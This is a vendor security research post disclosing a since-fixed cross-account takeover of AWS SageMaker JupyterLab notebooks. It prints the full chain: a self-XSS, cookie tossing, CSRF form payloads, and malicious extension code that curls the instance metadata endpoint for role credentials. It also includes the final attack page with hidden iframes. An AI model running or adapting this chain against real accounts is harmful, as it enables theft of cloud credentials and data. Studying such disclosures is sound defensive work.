AWS SageMaker Jupyter Notebook Instance Takeover

During our research into the security of data science tools, we decided to look at Amazon SageMaker, a fully managed machine learning service in AWS. Here is the long and short of our recent discovery.

TL;DR

We found that an attacker can run any code on a victim’s SageMaker JupyterLab Notebook Instance across accounts. This means that an attacker can access the Notebook Instance metadata endpoint and steal the access token for the attached role.

Using the access token, the attacker can read data from S3 buckets, create VPC endpoints, and perform any other action allowed by the SageMaker execution role and the “AmazonSageMakerFullAccess” policy.

We reported the vulnerability we discovered to the AWS security team, and they have since remediated it.

Intro

Amazon SageMaker is a fully managed machine learning service. With SageMaker, data scientists and developers can quickly and easily build and train machine learning models, and then directly deploy them into a production-ready hosted environment. It provides an integrated Jupyter notebook instance for easy access to your data sources for exploration and analysis, so you don't have to manage servers.

When we create a Notebook Instance in AWS SageMaker, a new JupyterLab environment is created with a unique subdomain under the .notebook.us-east-1.sagemaker.aws parent domain (where us-east-1 can be replaced with a different region). Usually, the unique subdomain is the name we give the Notebook Instance at creation time, but if that subdomain has already been taken, AWS appends some random values to it.

I decided to play around with this environment and explore potential gaps, so I created a Notebook Instance named “gafnb” where gafnb.notebook.us-east-1.sagemaker.aws is its designated JupyterLab domain.

The following is a rundown of my path to the discovery of the AWS SageMaker Notebook Instance Takeover, following my thought process at each step.

Start with Self-XSS

Viewing the source of the main page exposes some interesting paths located on the VM running the JupyterLab application.

view-source:https://gafnb.notebook.us-east-1.sagemaker.aws/lab

 

img1b

One interesting path was the staticDir that pointed to
/home/ec2-user/anaconda3/envs/JupyterSystemEnv/share/jupyter/lab/static

I used the terminal in JupyterLab to list the files in the static directory and found index.html.

img2b

We can change its content and control what is running when browsing to: https://gafnb.notebook.us-east-1.sagemaker.aws/lab

img3b

img4b

This is clearly an XSS – but it is self XSS 🙁

Maybe this isn’t so useful… Or is it?

Cookies to the Rescue

As I mentioned at the beginning, all JupyterLab notebooks in SageMaker are created under the same parent domain. To be more specific, they are all subdomains of .sagemaker.aws

In such an environment, where each user gets their own subdomain under the same parent domain, it is interesting to have a look at the cookies:

img5b

The _xsrf cookie is set for the notebook's full domain. I wondered whether I could use cookie tossing…

A cookie is keyed by the tuple (name, domain, path). Therefore, two cookies can share the same name as long as they differ in domain or path.

img6b
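To make the keying rule concrete, here is a minimal sketch of a toy cookie jar. It is not how any real browser stores cookies; the CookieJar class and the "legit-token" value are made up for illustration. It only shows that two _xsrf cookies with different domains can coexist.

```typescript
// A toy cookie jar keyed by (name, domain, path). Hypothetical, for illustration only.
interface Cookie {
  name: string;
  value: string;
  domain: string;
  path: string;
}

class CookieJar {
  private store: { [key: string]: Cookie } = {};

  // Cookies with the same (name, domain, path) overwrite each other;
  // any difference in domain or path creates a separate entry.
  set(cookie: Cookie): void {
    const key = JSON.stringify([cookie.name, cookie.domain, cookie.path]);
    this.store[key] = cookie;
  }

  // Return every stored cookie that has the given name.
  byName(name: string): Cookie[] {
    const result: Cookie[] = [];
    for (const key of Object.keys(this.store)) {
      if (this.store[key].name === name) {
        result.push(this.store[key]);
      }
    }
    return result;
  }
}

const jar = new CookieJar();
// The cookie set by the notebook itself ("legit-token" is a placeholder value).
jar.set({ name: "_xsrf", value: "legit-token", domain: "gafnb.notebook.us-east-1.sagemaker.aws", path: "/" });
// A second cookie with the same name but a broader domain.
jar.set({ name: "_xsrf", value: "1", domain: ".sagemaker.aws", path: "/" });
const xsrfCookies = jar.byName("_xsrf"); // both entries are kept
```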

I decided to use the self-XSS to create a new cookie named _xsrf with its Domain attribute set to .sagemaker.aws, so that it is sent to all of its subdomains.

<script type="text/javascript">
document.cookie='_xsrf=1;Domain= .sagemaker.aws';
</script>

/home/ec2-user/anaconda3/envs/JupyterSystemEnv/share/jupyter/lab/static/index.html

This new _xsrf=1 cookie will then be sent to all subdomains of .sagemaker.aws, including the victim’s SageMaker JupyterLab domain in a different AWS account:
victim-poc-nb.notebook.us-east-1.sagemaker.aws.
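Why does the victim's subdomain receive the cookie? The sketch below is a simplified version of the domain-match rule from RFC 6265 (section 5.1.3). The function name is my own, and real browsers apply extra checks (IP addresses, public suffixes) that are left out here.

```typescript
// Simplified domain-match check in the spirit of RFC 6265, section 5.1.3.
// `cookieDomain` is the Domain attribute; surrounding whitespace and a leading dot are ignored.
function domainMatches(requestHost: string, cookieDomain: string): boolean {
  const host = requestHost.toLowerCase();
  let domain = cookieDomain.trim().toLowerCase();
  if (domain.charAt(0) === ".") {
    domain = domain.slice(1);
  }
  if (domain === "") {
    return false;
  }
  if (host === domain) {
    return true;
  }
  // Otherwise the host must end with "." + domain to count as a subdomain.
  const suffix = "." + domain;
  return host.length > suffix.length &&
    host.slice(host.length - suffix.length) === suffix;
}

const attackerHost = "attacker-poc-nb.notebook.us-east-1.sagemaker.aws";
const victimHost = "victim-poc-nb.notebook.us-east-1.sagemaker.aws";

// The cookie is set from the attacker's notebook but matches the victim's host too.
const sentToAttacker = domainMatches(attackerHost, " .sagemaker.aws");
const sentToVictim = domainMatches(victimHost, " .sagemaker.aws");
// A lookalike host that merely ends with the same letters does not match.
const sentToLookalike = domainMatches("evilsagemaker.aws", ".sagemaker.aws");
```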

Self XSS to CSRF

Since I now control the _xsrf value, I might be able to achieve CSRF. The JupyterLab server protects against CSRF by comparing the value of the _xsrf cookie with the value of the X-Xsrftoken header.

I tested the CSRF mechanism with a POST request that opens a new terminal.

Starting with the valid request (below):

img7b

And response (below):

img8b

Next, I removed the X-Xsrftoken header to see how the server would respond. The first image is the request, and the second is the server’s response.

img9b

img10b

It looks like the server expects an _xsrf argument, so I tried adding it as a request parameter. The images are the request followed by the response.

img11b

img12b

Nice! We see that we can use a _xsrf request parameter instead of the X-Xsrftoken header.
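The behaviour observed so far can be summarized in a small sketch. This is not the server's actual code, only my simplified model of what the requests above show: the token may arrive as an _xsrf request parameter or as an X-Xsrftoken header, and it just has to equal the _xsrf cookie. The IncomingRequest shape and the function name are assumptions made for illustration.

```typescript
// Hypothetical, simplified request shape (header names assumed to be lower-cased).
interface IncomingRequest {
  cookies: { [name: string]: string };
  headers: { [name: string]: string };
  query: { [name: string]: string };
}

// Returns true when the request carries a token equal to the _xsrf cookie.
function passesXsrfCheck(req: IncomingRequest): boolean {
  const expected = req.cookies["_xsrf"];
  // A request parameter is accepted as an alternative to the header.
  const supplied = req.query["_xsrf"] || req.headers["x-xsrftoken"];
  if (!expected || !supplied) {
    return false;
  }
  return expected === supplied;
}

// With a tossed cookie, the attacker chooses both sides of the comparison.
const forgedRequest: IncomingRequest = {
  cookies: { "_xsrf": "1" },
  headers: {},
  query: { "_xsrf": "1" },
};
const forgedAccepted = passesXsrfCheck(forgedRequest);
```

The point of the sketch is that nothing in the comparison depends on a secret the attacker cannot set, which is why being able to plant the cookie matters so much.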

Does the JupyterLab server check the Origin header value? No. The request and response below show this.

img13b

img14b

Well, we now have all we need to exploit the CSRF!

We can use the CSRF to open a new terminal in the victim’s JupyterLab and use a cross-origin WebSocket to run commands in the victim’s Notebook Instance. But there is also another way: using a JupyterLab extension.

Creating the JupyterLab Extension

JupyterLab extensions can customize or enhance any part of JupyterLab. They can provide new themes, file viewers and editors, or renderers for rich outputs in notebooks. We can create our own JupyterLab extension that will do anything we want on the victim’s JupyterLab Instance.

Let’s see what this might look like. I created an extension with the following code and uploaded its package to npm.

import {
  JupyterFrontEnd,
  JupyterFrontEndPlugin
} from '@jupyterlab/application';

/**
 * Initialization data for the mal_jupyter_ext extension.
 */
const plugin: JupyterFrontEndPlugin<void> = {
  id: 'mal_jupyter_ext:plugin',
  autoStart: true,
  activate: (app: JupyterFrontEnd) => {
    // Set a known _xsrf cookie so it matches the _xsrf request parameter below.
    document.cookie = "_xsrf=1";
    var xhr = new XMLHttpRequest();
    var terminalUrl = location.origin + "/api/terminals?_xsrf=1";
    // Ask the server to open a new terminal.
    xhr.open("POST", terminalUrl, true);
    xhr.withCredentials = true;
    xhr.onreadystatechange = function() {
      if (xhr.readyState == XMLHttpRequest.DONE && xhr.status == 200) {
        // Pull the terminal name out of the JSON response (the value of its first key).
        var terminal_id = xhr.responseText.split('"')[3];
        var wsUrl = "wss://" + location.host + "/terminals/websocket/" + terminal_id;
        var ws = new WebSocket(wsUrl);
        ws.onopen = function(evt) {
          // Type a command into the terminal: query IMDS and save the role credentials to a file.
          ws.send('["stdin","curl 169.254.169.254/latest/meta-data/iam/security-credentials/BaseNotebookInstanceEc2InstanceRole > SageMaker/token.json\\r"]');
        };
      }
    };
    xhr.send();
  }
};

export default plugin;

This extension opens a new terminal in the victim’s JupyterLab and uses a WebSocket to run a command that queries the IMDS endpoint and saves the temporary credentials of the attached role. If only there were some way to make the victim install my malicious extension 😉

Installing a Malicious Extension Using CSRF

To see the extension support in the UI, we need to click on Settings -> Enable Extension Manager (experimental).

Note: Even if the extension support is not enabled the attack flow described in this post can still occur.

img15b

Enabling it will add the extension icon on the left menu

img16b

When installing an extension an HTTP POST request is sent:

img17b

I can use the CSRF to send this POST request to install my malicious extension on the victim’s JupyterLab Instance.

I started with a simple CSRF payload that installs my malicious extension, called mal_jupyter_ex:

<html>
<form action="https://gafnb.notebook.us-east-1.sagemaker.aws/lab/api/extensions?_xsrf=1" method="POST" enctype="text/plain" target="_blank">
<input type="hidden" name="{&quot;cmd&quot;:&quot;install&quot;,&quot;extension_name&quot;:&quot;mal_jupyter_ex&quot;}" value="" />
<input type="submit" value="Submit request" />
</form>
</html>

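But the payload above produced an invalid JSON body: with enctype text/plain, the browser serializes each field as name=value, so a stray equals sign is appended after the JSON. The request is shown first, followed by the response.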

img18b

img19b

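We can fix this by making the equals sign part of a JSON string: the field name ends by opening a quoted key and the field value closes it, so the = lands inside a dummy key.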

<html>
<form action="https://gafnb.notebook.us-east-1.sagemaker.aws/lab/api/extensions?_xsrf=1" method="POST" enctype="text/plain" target="_blank">
<input type="hidden" name="{&quot;cmd&quot;:&quot;install&quot;,&quot;extension_name&quot;:&quot;mal_jupyter_ex&quot;,&quot;" value="&quot;:1}" />
<input type="submit" value="Submit request" />
</form>
</html>

img20b

img21b
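The equals-sign trick is easier to see outside the browser. The sketch below imitates how a form with enctype text/plain builds its body (name=value per field, each followed by CRLF) and checks which of the two payloads parses as JSON. The helper names are my own.

```typescript
// Serialize form fields the way a browser does for enctype="text/plain":
// each field becomes name=value followed by CRLF, with no escaping.
function encodeTextPlain(fields: Array<[string, string]>): string {
  let body = "";
  for (const field of fields) {
    body += field[0] + "=" + field[1] + "\r\n";
  }
  return body;
}

// Returns true if the text parses as JSON.
function isValidJson(text: string): boolean {
  try {
    JSON.parse(text);
    return true;
  } catch (_err) {
    return false;
  }
}

// First attempt: the whole JSON document is the field name, the value is empty,
// so the body ends with a stray "=".
const naiveBody = encodeTextPlain([
  ['{"cmd":"install","extension_name":"mal_jupyter_ex"}', ""],
]);

// Second attempt: the name ends by opening a key, the value closes it,
// so the "=" becomes a harmless dummy key.
const fixedBody = encodeTextPlain([
  ['{"cmd":"install","extension_name":"mal_jupyter_ex","', '":1}'],
]);

const naiveIsJson = isValidJson(naiveBody);
const fixedIsJson = isValidJson(fixedBody);
const parsedFixed = JSON.parse(fixedBody);
```

The trailing CRLF is plain whitespace to a JSON parser, so only the equals sign needs to be dealt with.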

After installing a new extension, a build is required. We can use the CSRF to run the build request as well.

Tricky SameSite

I guess that by now some of you (including myself at the time) are wondering: what about SameSite, which defaults to Lax?

Well, in some browsers, like Safari, the default is still None. But after some digging, I found a way to exploit it on Chrome as well. Apparently, Chrome gives us “2 minutes of grace” during which the cookie will be sent even in a POST request.

Note: Chrome will make an exception for cookies set without a SameSite attribute less than 2 minutes ago. Such cookies will also be sent with non-idempotent (e.g. POST) top-level cross-site requests despite normal SameSite=Lax cookies requiring top-level cross-site requests to have a safe (e.g. GET) HTTP method. Support for this intervention ("Lax + POST") will be removed in the future.
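Here is a rough model of the rule in that note, written as a decision function. It is a sketch based only on the note's wording, not on Chrome's source; the type and function names are hypothetical, and details such as the Secure requirement for SameSite=None are ignored.

```typescript
type SameSite = "Strict" | "Lax" | "None" | undefined; // undefined = attribute not set

interface CookieInfo {
  sameSite: SameSite;
  ageSeconds: number; // time since the cookie was set
}

interface CrossSiteRequest {
  method: string;
  topLevelNavigation: boolean;
}

const LAX_POST_GRACE_SECONDS = 120; // the "2 minutes" from the note
const SAFE_METHODS = ["GET", "HEAD", "OPTIONS", "TRACE"];

// Decide whether a cookie accompanies a cross-site request under "Lax by default"
// with the temporary "Lax + POST" exception.
function sentOnCrossSiteRequest(cookie: CookieInfo, req: CrossSiteRequest): boolean {
  if (cookie.sameSite === "None") {
    return true;
  }
  if (cookie.sameSite === "Strict") {
    return false;
  }
  // From here on the cookie is Lax, either explicitly or by default.
  if (!req.topLevelNavigation) {
    return false;
  }
  if (SAFE_METHODS.indexOf(req.method.toUpperCase()) !== -1) {
    return true;
  }
  // Lax + POST: only cookies set WITHOUT a SameSite attribute, and only while fresh.
  return cookie.sameSite === undefined && cookie.ageSeconds < LAX_POST_GRACE_SECONDS;
}

const topLevelPost: CrossSiteRequest = { method: "POST", topLevelNavigation: true };
const freshCookieSent = sentOnCrossSiteRequest({ sameSite: undefined, ageSeconds: 30 }, topLevelPost);
const staleCookieSent = sentOnCrossSiteRequest({ sameSite: undefined, ageSeconds: 300 }, topLevelPost);
const explicitLaxSent = sentOnCrossSiteRequest({ sameSite: "Lax", ageSeconds: 30 }, topLevelPost);
```

So the question becomes: how do I make sure the victim's cookies are less than two minutes old?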

I decided to search for the request that sets the JupyterLab cookies.

When the user clicks “Open JupyterLab” in the AWS console, a GET request is sent to:

https://console.aws.amazon.com/sagemaker/home?region=us-east-1#/notebook-instances/openNotebook/gafnb?view=lab

img22b

This HTTP request triggers a flow that generates an authentication token for the matching JupyterLab called authToken. The token is forwarded to the JupyterLab domain and if it is valid, the JupyterLab application sets all session cookies.

img23b

Luckily, this is a GET request, and the AWS console’s cookies are defined with SameSite Lax or None, so we can trigger this flow using window.open or a link from a different origin.

Once this request is sent by the victim’s browser, the cookies are newly set, and I have 2 minutes to complete my attack.

Putting it all Together

The attacker:

  1. Creates the “attacking” notebook in the attacker’s AWS SageMaker account.
    Let’s call it attacker-poc-nb
  2. Assuming the victim’s notebook name is victim-poc-nb, the attacker opens a terminal in the attacking notebook and replaces the content of
    /home/ec2-user/anaconda3/envs/JupyterSystemEnv/share/jupyter/lab/static/index.html
    with the content below:
    <html>
    <a href="#" onclick="resetCookies()">Start Attack!</a>

    <form name="step1" action="https://victim-poc-nb.notebook.us-east-1.sagemaker.aws/lab/api/extensions?_xsrf=1" method="POST" enctype="text/plain" target="frame1">
    <input type="hidden" name="&#123;&quot;cmd&quot;&#58;&quot;install&quot;&#44;&quot;extension&#95;name&quot;&#58;&quot;mal_jupyter_ex&quot;&#44;&quot;" value="&quot;&#58;1&#125;" />
    </form>
    <form name="step2" action="https://victim-poc-nb.notebook.us-east-1.sagemaker.aws/lab/api/build?_xsrf=1" method="POST" target="frame2">
    </form>

    <iframe name="frame1" style="position: absolute;width:0;height:0;border:0;"></iframe>
    <iframe name="frame2" style="position: absolute;width:0;height:0;border:0;"></iframe>

    <script>

    function resetCookies(){
    window.open('https://console.aws.amazon.com/sagemaker/home?region=us-east-1#/notebook-instances/openNotebook/victim-poc-nb?view=lab');
    setTimeout(function(){ installExtension(); }, 5000);
    }

    function installExtension(){
    document.cookie='_xsrf=1;Domain= .sagemaker.aws';
    document.forms["step1"].submit();
    setTimeout(function(){ build(); }, 5000);
    }

    function build(){
    document.forms["step2"].submit();
    }

    </script>
    </html>

    img24b

  3. Turns on Burp’s interceptor and opens the attacker-poc-nb notebook from the AWS console.

    img25b
  4. Copies the URL with the authentication token and drops the request.
  5. Sends the link from the previous step to the victim. The link directs to the attacker notebook attacker-poc-nb with the authentication token.

The victim:

  1. Is already logged in to their AWS account

  2. Clicks the malicious link that opens the attacker’s attacker-poc-nb

  3. Clicks the link/button that starts the attack flow.

    img26b
  4. In the background, once the victim clicks the malicious link/button, requests are sent to install the malicious extension and rebuild the victim’s JupyterLab. A “build failed” error at this point is OK.

  5. Reopens the notebook victim-poc-nb (the build can take a minute). There should now be a token.json file containing the temporary credentials of the attached role.

    img27b

The Mitigation

Following our discovery, we reported the vulnerability to the AWS security team, and they have since remediated it. They added a check on the Origin header to ensure that the request is from the same origin to prevent the CSRF vulnerability.
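For readers who want a feel for what such a check looks like, here is a minimal sketch. I do not know how AWS implemented the fix; the function name, the exact comparison, and the choice to reject requests with no Origin header are all my assumptions.

```typescript
// Hypothetical Origin check for state-changing requests.
// `expectedOrigin` is the notebook's own origin, e.g. "https://<name>.notebook.<region>.sagemaker.aws".
function isSameOrigin(originHeader: string | undefined, expectedOrigin: string): boolean {
  if (!originHeader) {
    // Assumption: treat a missing Origin header as untrusted.
    return false;
  }
  // Scheme and host are case-insensitive, so compare in lower case.
  return originHeader.toLowerCase() === expectedOrigin.toLowerCase();
}

const victimOrigin = "https://victim-poc-nb.notebook.us-east-1.sagemaker.aws";

// A form submitted from the attacker's notebook carries the attacker's origin.
const crossOriginAllowed = isSameOrigin(
  "https://attacker-poc-nb.notebook.us-east-1.sagemaker.aws",
  victimOrigin
);
// A request made by the victim's own JupyterLab page carries the victim's origin.
const sameOriginAllowed = isSameOrigin(victimOrigin, victimOrigin);
```

Unlike the _xsrf cookie, the Origin header is set by the browser and cannot be chosen by a page on another subdomain, so a tossed cookie no longer helps.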

-----------------------------------

About Lightspin

Lightspin’s context-based cloud security empowers cloud and security teams to eliminate risks and maximize productivity by proactively and automatically detecting all security risks, smartly prioritizing the most critical issues, and easily fixing them. For more information, visit https://www.lightspin.io/